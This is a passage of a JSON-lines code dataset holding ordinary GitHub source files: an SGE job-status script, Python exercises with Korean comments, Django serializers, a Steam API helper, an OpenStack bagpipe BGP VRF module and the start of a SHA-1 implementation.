0:\n job_status = \"success\"\n break\n\n if exit_code != 0:\n job_status = \"failed\"\n break\n\n except sp.CalledProcessError as e:\n logger.warning(\"qacct process error\")\n logger.warning(e)\n if i >= STATUS_ATTEMPTS - 1:\n job_status = \"failed\"\n break\n else:\n # qacct can be quite slow to update on large servers\n time.sleep(5)\n pass\n\nprint(job_status)\n","repo_name":"AndrewsLabUCSF/sge-wynton","sub_path":"sge-status.py","file_name":"sge-status.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"11207681420","text":"# Python Program to find Sum of Even and Odd Numbers in a List\n\n\ndef even_sum(num_list):\n evensum = 0\n for j in 
range(int):\n if num_list[j] % 2 == 0:\n evensum = evensum + num_list[j]\n return evensum\n\n","repo_name":"amberlowe1001/automation-algorithms1","sub_path":"algoriyhms-4/example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44089988705","text":"\"\"\"\nScript to verify advantages of agents using Upper-Confidence-Bounds action-value estimates over\nagents using Sample-Average estimates in stationary problems, presented in Sutton \n(Reinforcement Learning 2018) p.36 fig 2.4\n\"\"\"\n\nfrom common.enviroments import Enviroment, StatTestbed\nfrom common.agents import SAAgent, UCB_SAAgent\nfrom common.utils import compare\nfrom pathlib import Path\n\ndef main():\n k = 10\n c = 2\n epsilon = 0.1\n agents = [SAAgent(epsilon, k), UCB_SAAgent(c, k)]\n testbed = StatTestbed(k)\n iterations = 2000\n plays = 1000\n\n env = Enviroment(agents, testbed, iterations, plays)\n path = Path(__file__).resolve() # Path (and file name) to save the image\n\n compare(env, path)\n\nif __name__ == \"__main__\":\n main()","repo_name":"pfontana96/rl-research","sub_path":"bandit-algorithms/ucb_vs_e-greedy.py","file_name":"ucb_vs_e-greedy.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2992833057","text":"#!/usr/bin/env python\n\nimport context\nimport nbateammatechain.utils.serialize as serialize\nimport nbateammatechain.players.build_teammates as build_teammates\nimport unittest2 as unittest\n\nclass testSerialize(unittest.TestCase):\n \"\"\"\n Tests for proper serialization of objects within objects\n \"\"\"\n @classmethod\n def setUpClass(cls):\n \"\"\"\n Initialize dictionary objects\n \"\"\"\n filename = \"test_serialize_teammates.pickle\"\n cls.dict = build_teammates.full_teammates()\n serialize.create_pickle(filename, cls.dict)\n cls.dict2 = serialize.load_pickle(filename)\n\n def test_obj_within_dict(self):\n \"\"\"\n Tests that the teammate objects are correct\n \"\"\"\n self.assertTrue(cmp(self.dict['thornma01'].teammates, \n self.dict2['thornma01'].teammates) == 0)\n\n self.assertIsNone(self.dict['landrca01'].teammates.get('rodrise01'))\n self.assertIsNotNone(self.dict['landrca01'].teammates.get('dorsejo01'))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"simarchhabra/NBA-Teammate-Chain","sub_path":"tests/test_serialize_teammates.py","file_name":"test_serialize_teammates.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23744752059","text":"from django.db import transaction\nfrom rest_framework import pagination, serializers\n\nfrom books.models import Book\nfrom users.serializers import CurrentUserSerializer\n\nfrom .models import Profile\n\n\nclass RelationPaginator(pagination.PageNumberPagination):\n \"\"\"For nested serializer pagination\"\"\"\n\n def get_paginated_response(self, data):\n return {\n \"count\": self.page.paginator.count,\n \"next\": self.get_next_link(),\n \"previous\": self.get_previous_link(),\n \"results\": data,\n }\n\n\nclass ProfileBookSerializer(serializers.HyperlinkedModelSerializer):\n author = serializers.StringRelatedField(many=True)\n\n class Meta:\n model = Book\n fields = [\"id\", \"title\", \"author\", \"cover_image\"]\n\n\nclass ProfileSerializer(serializers.ModelSerializer):\n user = 
serializers.CharField(default=\"user.username\", read_only=True)\n email = serializers.EmailField(source=\"user.email\")\n first_name = serializers.CharField(source=\"user.first_name\")\n last_name = serializers.CharField(source=\"user.last_name\")\n\n def update(self, instance, validated_data):\n with transaction.atomic():\n user_data = validated_data.pop(\"user\")\n user = instance.user\n\n user_ser = CurrentUserSerializer(instance=user, data=user_data)\n if user_ser.is_valid():\n user_ser.save()\n\n return super().update(instance, validated_data)\n\n class Meta:\n model = Profile\n fields = [\n \"id\",\n \"user\",\n \"email\",\n \"first_name\",\n \"last_name\",\n \"phone\",\n \"birth_date\",\n \"about\",\n ]\n\n\nclass ProfileDetailSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is for displaying a user favorite books list\n \"\"\"\n\n user = serializers.CharField(source=\"user.username\", read_only=True)\n email = serializers.EmailField(source=\"user.email\")\n first_name = serializers.CharField(source=\"user.first_name\")\n last_name = serializers.CharField(source=\"user.last_name\")\n\n favorite_list = serializers.SerializerMethodField(read_only=True)\n\n def get_favorite_list(self, obj):\n # books = Book.objects.filter(favorite=obj.user.id)\n books = obj.user.favorite_books.all()\n serializer = ProfileBookSerializer(books, many=True, context=self.context)\n # context=self.context: to display the url of the image\n paginator = RelationPaginator()\n paginate_data = paginator.paginate_queryset(\n queryset=serializer.data, request=self.context[\"request\"]\n )\n result = paginator.get_paginated_response(paginate_data)\n return result\n\n class Meta:\n model = Profile\n fields = [\n \"id\",\n \"user\",\n \"email\",\n \"first_name\",\n \"last_name\",\n \"phone\",\n \"birth_date\",\n \"about\",\n \"favorite_list\",\n ]\n","repo_name":"Hosseinht/bookland","sub_path":"profiles/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73797901561","text":"# _*_ coding:utf-8 _*_\nimport requests\nfrom bs4 import BeautifulSoup as bs\nfrom xml.dom import minidom\nimport json\n\n\nclass UserDoesNotExistError(Exception):\n pass\n\n\nclass User(object):\n\n def __init__(self, steamID64, api_key):\n self.steamID64 = steamID64\n self.api_key = api_key\n\n def check_account(self):\n url = \"http://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key={}&steamids={}\".format(\n self.api_key,\n self.steamID64\n )\n d = json.loads(requests.get(url).content)\n if not d[\"response\"][\"players\"]:\n raise UserDoesNotExistError\n else:\n return d[\"response\"][\"players\"][0][\"personaname\"]\n\n def get_whishlist(self):\n url = \"http://steamcommunity.com/profiles/{}/wishlist\".format(\n self.steamID64\n )\n r = requests.get(url)\n soup = bs(r.content, \"html.parser\")\n wish_games = soup.findAll(\"div\", \"wishlistRow\")\n game_ids = [i[\"id\"].split(\"_\")[-1] for i in wish_games]\n return game_ids\n\n @staticmethod\n def get_id_from_customURL(customURL):\n url = \"http://steamcommunity.com/id/{}/?xml=1\".format(\n customURL\n )\n dom = minidom.parseString(\n requests.get(url).content\n )\n steamID64 = dom.getElementsByTagName(\"steamID64\")[0].firstChild.data\n return 
steamID64\n","repo_name":"KururuSouchou/steambot","sub_path":"steam_api/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42520126075","text":"# 예제 4-1: 상하좌우\n# 문제: N x N 크기의 정사각형 그리드 위에서 [L, R, U, D] 인풋에 따라 좌우로 이동한다.\n# 이때, 시작점은 (1, 1) 이며 그리드 밖으로 이동하게 만드는 커맨드는 무시한다.\n\n# 내 답안:\n\n# Receive inputs\nn = int(input())\nplans = input().split()\n\nx, y = 1, 1\nnx, ny = 0, 0\n\n# Movement according to L, R, U, D\ndx = [0, 0, -1, 1]\ndy = [-1, 1, 0, 0]\ncommand_types = ['L', 'R', 'U', 'D']\n\n# Iterate through each plan and compare with command types\nfor plan in plans:\n for i in range(len(command_types)):\n if plan == command_types[i]:\n nx = x + dx[i]\n ny = y + dy[i]\n # Ignore if person escapes the map\n if nx < 1 or ny < 1 or nx > n or ny > n:\n continue\n # Move\n x, y = nx, ny\n\nprint(nx, ny)\n\n# 예제 4-2: 시각\n# 문제: 정수 N이 입력되면 00시 00분 00초부터 N시 59분 59초까지의 모든 시각 중에서 3이 하나라도 포함되는\n# 모든 경우의 수를 구하는 프로그램을 작성하시오.\n\n# 내 풀이\nn = int(input())\ncount = 0\n\nfor i in range(n + 1):\n for j in range(60):\n for k in range(60):\n if '3' in str(i) + str(j) + str(k):\n count += 1\n\nprint(count)\n\n# 예제 4-3: 왕실의 나이트\n# 문제: 8 x 8 체스판에서 나이트는 2 x 1 만큼 이동할 수 있다.\n# 나이트의 현 위치가 주어졌을 때 이동할 수 있는 경로의 경우의 수를 출력하라.\n\n# Receive current position\npos = input()\nrow = int(pos[1])\ncol = int(ord(pos[0]) - ord('a')) + 1\n\n# Define possible movements\nsteps = [(-2, -1), (-2, 1), (2, -1), (2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2)]\n\n# Check if movement is possible\ncounter = 0\nfor step in steps:\n next_row = row + step[0]\n next_col = col + step[1]\n # Increase counter if possible\n if next_row >= 1 and next_row <= 8 and next_col >= 1 and next_col <= 8:\n counter += 1\n\nprint(counter)\n\n# 앞서 '상하좌우' 문제에서는 dx, dy 리스트를 선언하여 이동할 방향을 기록할 수 있도록 하였다면\n# 이번 소스코드에서는 steps 변수가 dx와 dy 변수의 기능을 대신하여 수행한다.\n# 2가지 형태 모두 자주 사용되므로, 참고하도록 하자.\n\n# 예제 4-3: 게임 개발\n# 문제: 1 x 1 의 정사각형으로 이뤄진 N x M 크기의 직사각형 맵이 있다.\n# 각각의 칸은 츅지 또는 바다이고 캐릭터는 동서남북 중 한 곳을 바라본다.\n# 맵의 각 칸은 (A, B) 로 나타내며 A는 북쪽으로부터, B는 서쪽으로부터 떨어진 칸의 개수이다.\n# 캐릭터는 상하좌우로 움직일 수 있고, 바다로 되어 있는 공간에는 갈 수 없다.\n\n# 캐릭터 매뉴얼:\n# 1. 현재 위치에서 현재 방향을 기준으로 왼쪽 방향부터 차례대로 갈 곳을 정함.\n# 2. 캐릭터의 ���로 왼쪽 방향에 아직 가보지 않은 칸이 존재한다면, 왼쪽 방향으로 회전한 다음 전진함.\n# 3. 왼쪽 방향에 가보지 않은 칸이 없다면, 왼쪽 방향으로 회전만 하고 1단계로 돌아감.\n# 3. 만약 네 방향 모두 이미 가본 칸이거나 바다로 되어 있는 칸인 경우에는, 바라보는 방향을 유지한 채로\n# 한 칸 뒤로 가고 1단계로 돌아간다. 
단, 이때 뒤쪽 방향이 바다인 칸이라 뒤로 갈 수 없는 경우에는 멈춘다.\n\n# 중요 테크닉:\n# 문제에선 각 방향을 나타내는 정수를 다음과 같이 명시한다:\n# - 0: 북쪽\n# - 1: 동쪽\n# - 2: 남쪽\n# - 3: 서쪽\n# 일반적으로 방향을 설정해서 이동하는 문제 유형에서는 dx, dy 라는 별도의 리스트를 만들어 방향을 정하는 것이 효과적\n# 예를 들면, 현재 캐릭터가 북쪽을 바라보고 있을 때는 북쪽으로 이동하기 위해 x, y 좌표를 각각 dx[0], dy[0] 씩 더함\n\n# Receive N x M\nn, m = map(int, input().split())\n\n# Create a map to record character movement\nd = [[0] * m for _ in range(n)]\n# Receive current character orientation\nx, y, direction = map(int, input().split())\nd[x][y] = 1\n\n# Receive entire map info\narray = []\nfor i in range(n):\n array.append(list(map(int, input().split())))\n\n# Define N, E, S, W\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\n# Turn left\ndef turn_left():\n global direction\n direction -= 1\n if direction == -1:\n direction = 3\n\n# Begin simulation\ncount = 1\nturn_time = 0\nwhile True:\n # Turn left\n turn_left()\n nx = x + dx[direction]\n ny = y + dy[direction]\n # If there is an unexplored space ahead, onward\n if d[nx][ny] == 0 and array[nx][ny] == 0:\n d[nx][ny] = 1\n x, y = nx, ny\n count += 1\n turn_time = 0\n continue\n # If there is no unexplored land or there's the ocean\n else:\n turn_time += 1\n # Can't go either direction\n if turn_time == 4:\n nx = x - dx[direction]\n ny = y - dy[direction]\n # If you can go backward, do so\n if array[nx][ny] == 0:\n x, y = nx, ny\n # If not\n else:\n break\n turn_time = 0\n\n# Print output\nprint(count)","repo_name":"joodevs/algorithm-basics","sub_path":"implementation.py","file_name":"implementation.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71322228921","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 26 07:23:37 2017\n\n@author: ashwin\n\"\"\"\ndef number():\n s = input(\"Enter the string in which you want to search :\")\n s1 = input(\"Enter the string which you want to search :\")\n n= 0\n i = 0\n for i in range(0,len(s)):\n if s[i:i+len(s1)] == s1 :\n n += 1\n i += 1\n print ('Number of times', s1 ,'occurs is:',n)\n u = input(\"Do you want to try another number? 
(Reply with yes/no)\")\n if u.lower == 'yes':\n number()\nnumber()","repo_name":"ashsek/Competetive-Codes","sub_path":"Code Chef/string finder.py","file_name":"string finder.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"25353692173","text":"import abc\nimport itertools\n\nfrom networking_bagpipe.bagpipe_bgp.common import exceptions as exc\nfrom networking_bagpipe.bagpipe_bgp.common import log_decorator\nfrom networking_bagpipe.bagpipe_bgp.common import looking_glass as lg\nfrom networking_bagpipe.bagpipe_bgp.common import utils\nfrom networking_bagpipe.bagpipe_bgp import constants\nfrom networking_bagpipe.bagpipe_bgp import engine\nfrom networking_bagpipe.bagpipe_bgp.engine import exa\nfrom networking_bagpipe.bagpipe_bgp.engine import flowspec\nfrom networking_bagpipe.bagpipe_bgp.engine import ipvpn as ipvpn_routes\nfrom networking_bagpipe.bagpipe_bgp.vpn import dataplane_drivers as dp_drivers\nfrom networking_bagpipe.bagpipe_bgp.vpn import vpn_instance\n\nDEFAULT_ADDR_PREFIX = '0.0.0.0/0'\n\n\nclass VPNInstanceDataplane(dp_drivers.VPNInstanceDataplane,\n metaclass=abc.ABCMeta):\n\n @abc.abstractmethod\n def add_dataplane_for_traffic_classifier(self, classifier,\n redirect_to_instance_id):\n pass\n\n @abc.abstractmethod\n def remove_dataplane_for_traffic_classifier(self, classifier):\n pass\n\n\nclass DummyVPNInstanceDataplane(dp_drivers.DummyVPNInstanceDataplane,\n VPNInstanceDataplane):\n\n def add_dataplane_for_traffic_classifier(self, *args, **kwargs):\n raise Exception(\"not implemented\")\n\n def remove_dataplane_for_traffic_classifier(self, *args, **kwargs):\n raise Exception(\"not implemented\")\n\n\nclass DummyDataplaneDriver(dp_drivers.DummyDataplaneDriver):\n type = constants.IPVPN\n dataplane_instance_class = DummyVPNInstanceDataplane\n\n\nclass VRF(vpn_instance.VPNInstance, lg.LookingGlassMixin):\n # component managing a VRF:\n # - calling a driver to instantiate the dataplane\n # - registering to receive routes for the needed route targets\n # - calling the driver to setup/update/remove routes in the dataplane\n # - cleanup: calling the driver, unregistering for BGP routes\n\n type = constants.IPVPN\n afi = exa.AFI.ipv4\n safi = exa.SAFI.mpls_vpn\n\n @log_decorator.log\n def __init__(self, *args, **kwargs):\n vpn_instance.VPNInstance.__init__(self, *args, **kwargs)\n self.readvertised = set()\n\n def needs_cleanup_assist(self, afi, safi):\n if (afi, safi) == (self.afi, exa.SAFI.flow_vpn):\n return True\n else:\n return self.dataplane.needs_cleanup_assist()\n\n @classmethod\n def validate_convert_params(cls, params, also_mandatory=()):\n return super(VRF, cls).validate_convert_params(\n params,\n also_mandatory=tuple(set(also_mandatory) | set(['ip_address'])))\n\n @classmethod\n def validate_convert_attach_params(cls, params):\n super(VRF, cls).validate_convert_attach_params(params)\n if 'gateway_ip' not in params:\n raise exc.APIMissingParameterException('gateway_ip')\n\n def _nlri_from(self, prefix, label, rd):\n assert rd is not None\n\n return ipvpn_routes.IPVPNRouteFactory(\n self.afi, prefix, label, rd,\n self.dp_driver.get_local_address())\n\n def generate_vif_bgp_route(self, mac_address, ip_prefix, plen, label, rd):\n # Generate BGP route and advertise it...\n nlri = self._nlri_from(\"%s/%s\" % (ip_prefix, plen), label, rd)\n\n return engine.RouteEntry(nlri)\n\n def _get_local_labels(self):\n for port_data in self.mac_2_localport_data.values():\n yield 
port_data['label']\n\n def _get_route_params_for_endpoint(self, endpoint):\n port_data = self.mac_2_localport_data[endpoint[0]]\n label = port_data['label']\n lb_consistent_hash_order = port_data[\n 'lb_consistent_hash_order']\n rd = self.endpoint_2_rd[endpoint]\n\n return (label, rd, lb_consistent_hash_order)\n\n def _imported(self, route):\n return len(set(route.route_targets).intersection(set(self.import_rts))\n ) > 0\n\n def _to_readvertise(self, route):\n rt_records = route.ecoms(exa.RTRecord)\n self.log.debug(\"RTRecords: %s (readvertise_to_rts:%s)\",\n rt_records,\n self.readvertise_to_rts)\n\n readvertise_targets_as_records = [exa.RTRecord.from_rt(rt)\n for rt in self.readvertise_to_rts]\n\n if self.attract_traffic:\n readvertise_targets_as_records += [exa.RTRecord.from_rt(rt)\n for rt in self.attract_rts]\n\n if set(readvertise_targets_as_records).intersection(set(rt_records)):\n self.log.debug(\"not to re-advertise because one of the readvertise\"\n \" or attract-redirect RTs is in RTRecords: %s\",\n set(readvertise_targets_as_records)\n .intersection(set(rt_records)))\n return False\n\n return len(set(route.route_targets).intersection(\n set(self.readvertise_from_rts)\n )) > 0\n\n def _gen_rtrecords_extended_community(self, ecoms):\n # new RTRecord = original RTRecord (if any) + orig RTs converted into\n # RTRecord attributes\n orig_rtrecords = ecoms(exa.RTRecord)\n rts = ecoms(exa.RTExtCom)\n add_rtrecords = [exa.RTRecord.from_rt(rt) for rt in rts]\n\n return list(set(orig_rtrecords) | set(add_rtrecords))\n\n def _route_for_readvertisement(self, route, endpoint):\n label, rd, lb_consistent_hash_order = (\n self._get_route_params_for_endpoint(endpoint)\n )\n self.log.debug(\"Prefix %s (re-)advertisement with label %s and route \"\n \"distinguisher %s\", route.nlri.cidr.prefix(), label, rd)\n nlri = self._nlri_from(route.nlri.cidr.prefix(), label, rd)\n\n attributes = exa.Attributes()\n\n ecoms = self._gen_encap_extended_communities()\n ecoms.communities += (\n self._gen_rtrecords_extended_community(route.ecoms)\n )\n ecoms.communities.append(\n exa.ConsistentHashSortOrder(lb_consistent_hash_order))\n attributes.add(ecoms)\n\n entry = engine.RouteEntry(nlri, self.readvertise_to_rts, attributes)\n self.log.debug(\"RouteEntry for (re-)advertisement: %s\", entry)\n return entry\n\n def _default_route_for_advertisement(self, endpoint):\n label, rd, lb_consistent_hash_order = (\n self._get_route_params_for_endpoint(endpoint)\n )\n self.log.debug(\"Default route (re-)advertisement with label %s and \"\n \"route distinguisher %s\", label, rd)\n nlri = self._nlri_from(DEFAULT_ADDR_PREFIX, label, rd)\n\n attributes = exa.Attributes()\n\n ecoms = self._gen_encap_extended_communities()\n ecoms.communities.append(\n exa.ConsistentHashSortOrder(lb_consistent_hash_order))\n attributes.add(ecoms)\n\n entry = engine.RouteEntry(nlri, self.readvertise_to_rts, attributes)\n self.log.debug(\"RouteEntry for default prefix advertisement: %s\",\n entry)\n return entry\n\n @log_decorator.log\n def _routes_for_attract_static_dest_prefixes(self, endpoint):\n if not self.attract_static_dest_prefixes:\n return\n\n label, rd, _ = self._get_route_params_for_endpoint(endpoint)\n\n for prefix in self.attract_static_dest_prefixes:\n nlri = self._nlri_from(prefix, label, rd)\n\n entry = engine.RouteEntry(nlri, self.readvertise_to_rts)\n self.log.debug(\"RouteEntry for attract static destination prefix: \"\n \"%s\", entry)\n yield entry\n\n @log_decorator.log\n def _route_for_redirect_prefix(self, prefix):\n 
prefix_classifier = utils.dict_camelcase_to_underscore(\n self.attract_classifier)\n prefix_classifier['destination_prefix'] = prefix\n\n traffic_classifier = vpn_instance.TrafficClassifier(\n **prefix_classifier)\n self.log.debug(\"Advertising prefix %s for redirection based on \"\n \"traffic classifier %s\", prefix, traffic_classifier)\n rules = traffic_classifier.map_traffic_classifier_2_redirect_rules()\n\n return self.synthesize_redirect_bgp_route(rules)\n\n def _redirect_route_for_readvertisement(self, route):\n # Create a FlowSpec NLRI with distinct RD and a copy of rules from\n # FlowSpec route to readvertise\n nlri = flowspec.FlowRouteFactory(self.afi, self.instance_rd)\n nlri.rules = route.nlri.rules\n\n attributes = exa.Attributes()\n\n ecoms = exa.ExtendedCommunities()\n ecoms.communities += (\n self._gen_rtrecords_extended_community(route.ecoms)\n )\n assert len(self.attract_rts) == 1\n rt = self.attract_rts[0]\n ecoms.communities.append(\n exa.TrafficRedirect(exa.ASN(int(rt.asn)), int(rt.number))\n )\n attributes.add(ecoms)\n\n entry = engine.RouteEntry(nlri, self.readvertise_to_rts, attributes)\n self.log.debug(\"RouteEntry for redirect (re-)advertisement: %s\", entry)\n return entry\n\n @log_decorator.log\n def _readvertise(self, route):\n nlri = route.nlri\n\n self.log.debug(\"Start re-advertising %s from VRF\", nlri)\n if self.attract_traffic:\n # Start advertising default route only when the first route to\n # readvertise appears\n if not self.readvertised:\n for endpoint in self.all_endpoints():\n self.log.debug(\"Start advertising default route from VRF \"\n \"%d to redirection VRF\", self.instance_id)\n self._advertise_route(\n self._default_route_for_advertisement(endpoint)\n )\n\n if isinstance(nlri, flowspec.Flow):\n # Readvertise FlowSpec route\n self._advertise_route(\n self._redirect_route_for_readvertisement(route)\n )\n else:\n # Advertise FlowSpec route for prefix\n self._advertise_route(\n self._route_for_redirect_prefix(nlri.cidr.prefix())\n )\n\n else:\n for endpoint in self.all_endpoints():\n self.log.debug(\"Start re-advertising %s from endpoint %s\",\n nlri.cidr.prefix(), endpoint)\n self._advertise_route(\n self._route_for_readvertisement(route, endpoint)\n )\n\n self.readvertised.add(route)\n\n @log_decorator.log\n def _readvertise_stop(self, route, last):\n nlri = route.nlri\n\n if last:\n self.log.debug(\"Stop re-advertising %s from VRF\", nlri)\n if self.attract_traffic:\n # Stop advertising default route only if the withdrawn route is\n # the last of the routes to readvertise\n if len(self.readvertised) == 1:\n for endpoint in self.all_endpoints():\n self.log.debug(\"Stop advertising default route from \"\n \"VRF to redirection VRF\")\n self._withdraw_route(\n self._default_route_for_advertisement(endpoint)\n )\n\n if isinstance(nlri, flowspec.Flow):\n # Withdraw readvertised FlowSpec route\n self._withdraw_route(\n self._redirect_route_for_readvertisement(route)\n )\n else:\n # Withdraw FlowSpec route for prefix\n self._withdraw_route(\n self._route_for_redirect_prefix(nlri.cidr.prefix())\n )\n else:\n for endpoint in self.all_endpoints():\n self.log.debug(\"Stop re-advertising %s from endpoint %s\",\n nlri.cidr.prefix(), endpoint)\n route_entry = (\n self._route_for_readvertisement(route, endpoint)\n )\n self._withdraw_route(route_entry)\n\n self.readvertised.remove(route)\n\n @log_decorator.log_info\n def vif_plugged(self, mac_address, ip_address_prefix, localport,\n advertise_subnet=False, lb_consistent_hash_order=0,\n local_pref=None, 
**kwargs):\n super(VRF, self).vif_plugged(mac_address, ip_address_prefix,\n localport, advertise_subnet,\n lb_consistent_hash_order, local_pref,\n **kwargs)\n\n if vpn_instance.forward_to_port(kwargs.get('direction')):\n endpoint = (mac_address, ip_address_prefix)\n for route in itertools.chain(\n self.readvertised,\n self._routes_for_attract_static_dest_prefixes(endpoint)):\n self.log.debug(\"Re-advertising %s with this port as next hop\",\n route.nlri)\n if self.attract_traffic:\n self._advertise_route(\n self._default_route_for_advertisement(endpoint)\n )\n\n if self.has_only_one_endpoint():\n self._advertise_route(self._route_for_redirect_prefix(\n route.nlri.cidr.prefix()))\n else:\n self._advertise_route(\n self._route_for_readvertisement(route, endpoint)\n )\n\n @log_decorator.log_info\n def vif_unplugged(self, mac_address, ip_address_prefix):\n endpoint = (mac_address, ip_address_prefix)\n direction = self.endpoint_2_direction[endpoint]\n if vpn_instance.forward_to_port(direction):\n for route in itertools.chain(\n self.readvertised,\n self._routes_for_attract_static_dest_prefixes(endpoint)):\n self.log.debug(\"Stop re-advertising %s\", route.nlri)\n if self.attract_traffic:\n self._withdraw_route(\n self._default_route_for_advertisement(endpoint)\n )\n\n if self.has_only_one_endpoint():\n self._withdraw_route(self._route_for_redirect_prefix(\n route.nlri.cidr.prefix()))\n else:\n self._withdraw_route(\n self._route_for_readvertisement(route, endpoint)\n )\n\n super(VRF, self).vif_unplugged(mac_address, ip_address_prefix)\n\n # Callbacks for BGP route updates (TrackerWorker) ########################\n\n def route_to_tracked_entry(self, route):\n if isinstance(route.nlri, ipvpn_routes.IPVPN):\n return route.nlri.cidr.prefix()\n elif isinstance(route.nlri, flowspec.Flow):\n return (flowspec.Flow, route.nlri._rules())\n else:\n self.log.error(\"We should not receive routes of type %s\",\n type(route.nlri))\n return None\n\n @utils.synchronized\n @log_decorator.log\n def new_best_route(self, entry, new_route):\n\n if self.readvertise:\n # check if this is a route we need to re-advertise\n self.log.debug(\"route RTs: %s\", new_route.route_targets)\n self.log.debug(\"readv from RTs: %s\", self.readvertise_from_rts)\n if self._to_readvertise(new_route):\n self.log.debug(\"Need to re-advertise %s\", entry)\n self._readvertise(new_route)\n\n if not self._imported(new_route):\n self.log.debug(\"No need to setup dataplane for:%s\", entry)\n return\n\n if isinstance(new_route.nlri, flowspec.Flow):\n if len(new_route.ecoms(exa.TrafficRedirect)) == 1:\n traffic_redirect = new_route.ecoms(exa.TrafficRedirect)\n redirect_rt = \"%s:%s\" % (traffic_redirect[0].asn,\n traffic_redirect[0].target)\n\n self.start_redirect_traffic(redirect_rt,\n new_route.nlri.rules)\n else:\n self.log.warning(\"FlowSpec action or multiple traffic \"\n \"redirect actions not supported: %s\",\n new_route.ecoms())\n else:\n prefix = entry\n\n encaps = self._check_encaps(new_route)\n if not encaps:\n return\n\n assert len(new_route.nlri.labels.labels) == 1\n\n lb_consistent_hash_order = 0\n if new_route.ecoms(exa.ConsistentHashSortOrder):\n lb_consistent_hash_order = new_route.ecoms(\n exa.ConsistentHashSortOrder)[0].order\n\n self.dataplane.setup_dataplane_for_remote_endpoint(\n prefix, new_route.nexthop,\n new_route.nlri.labels.labels[0], new_route.nlri, encaps,\n lb_consistent_hash_order)\n\n @utils.synchronized\n @log_decorator.log\n def best_route_removed(self, entry, old_route, last):\n\n if self.readvertise:\n # 
check if this is a route we were re-advertising\n if self._to_readvertise(old_route):\n self.log.debug(\"Need to stop re-advertising %s\", entry)\n self._readvertise_stop(old_route, last)\n\n if isinstance(old_route.nlri, flowspec.Flow):\n if self._imported(old_route):\n if len(old_route.ecoms(exa.TrafficRedirect)) == 1:\n if last:\n traffic_redirect = old_route.ecoms(\n exa.TrafficRedirect)\n redirect_rt = \"%s:%s\" % (traffic_redirect[0].asn,\n traffic_redirect[0].target)\n\n self.stop_redirect_traffic(redirect_rt,\n old_route.nlri.rules)\n else:\n self.log.warning(\"FlowSpec action or multiple traffic \"\n \"redirect actions not supported: %s\",\n old_route.ecoms())\n else:\n prefix = entry\n\n # NOTE(tmorin): On new best routes, we only trigger dataplane\n # update events after checking with self._imported(...) that the\n # route was imported (and not a route that we receive because the\n # VRF should readvertise ir). On best_route_removed, we can't do\n # that because we could end up in a situation where:\n # - initially import_rts contains RT X\n # - we receive a route for RT X and install dataplane state\n # - the import_rts list is later updated and RT X is not anymore\n # part of the imported RTs, and the VRF unsubscribes from RT X\n # - we receive the best_route_removed callbacks corresponding to\n # the unsubscribe, but since the route is for no RT that is in\n # import_rts, we don't update the dataplane\n # The result would be to fail to remove dataplane state for this\n # route, so we're better not optimizing this case and remove\n # dataplane state, including possibly for routes that we did\n # not install in it.\n\n if self._skip_route_removal(last):\n self.log.debug(\"Skipping removal of non-last route because \"\n \"dataplane does not want it\")\n return\n\n # if we still have a route with same dataplane properties in\n # best routes, then we don't want to clear the dataplane entry\n if self.equivalent_route_in_best_routes(\n old_route,\n lambda r: (r.nexthop, r.nlri.labels.labels[0])):\n self.log.debug(\"Route for same dataplane is still in best \"\n \"routes, skipping removal\")\n return\n\n encaps = self._check_encaps(old_route)\n if not encaps:\n return\n\n assert len(old_route.nlri.labels.labels) == 1\n\n lb_consistent_hash_order = 0\n if old_route.ecoms(exa.ConsistentHashSortOrder):\n lb_consistent_hash_order = old_route.ecoms(\n exa.ConsistentHashSortOrder)[0].order\n\n self.dataplane.remove_dataplane_for_remote_endpoint(\n prefix, old_route.nexthop,\n old_route.nlri.labels.labels[0], old_route.nlri, encaps,\n lb_consistent_hash_order)\n\n # Looking glass ###\n\n def get_lg_map(self):\n return {\n \"readvertised\": (lg.SUBTREE, self.get_lg_readvertised_routes),\n }\n\n def get_lg_readvertised_routes(self, path_prefix):\n return [route.get_lg_local_info(path_prefix)\n for route in self.readvertised]\n","repo_name":"openstack/networking-bagpipe","sub_path":"networking_bagpipe/bagpipe_bgp/vpn/ipvpn/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":21095,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"40"} +{"seq_id":"6960644861","text":"from util import *\nfrom sys import stdout \n\n\ndef sha1(BB, verbose = False):\n\n h0 = toBinArray(0x67452301,32)\n h1 = toBinArray(0xEFCDAB89,32)\n h2 = toBinArray(0x98BADCFE,32)\n h3 = toBinArray(0x10325476,32)\n h4 = toBinArray(0xC3D2E1F0,32) \n\n B = preprocess(BB)\n\n if(verbose): print(len(B))\n\n ii = 1\n\n for chunk in chunks(B):\n \n \"\"\"\n 
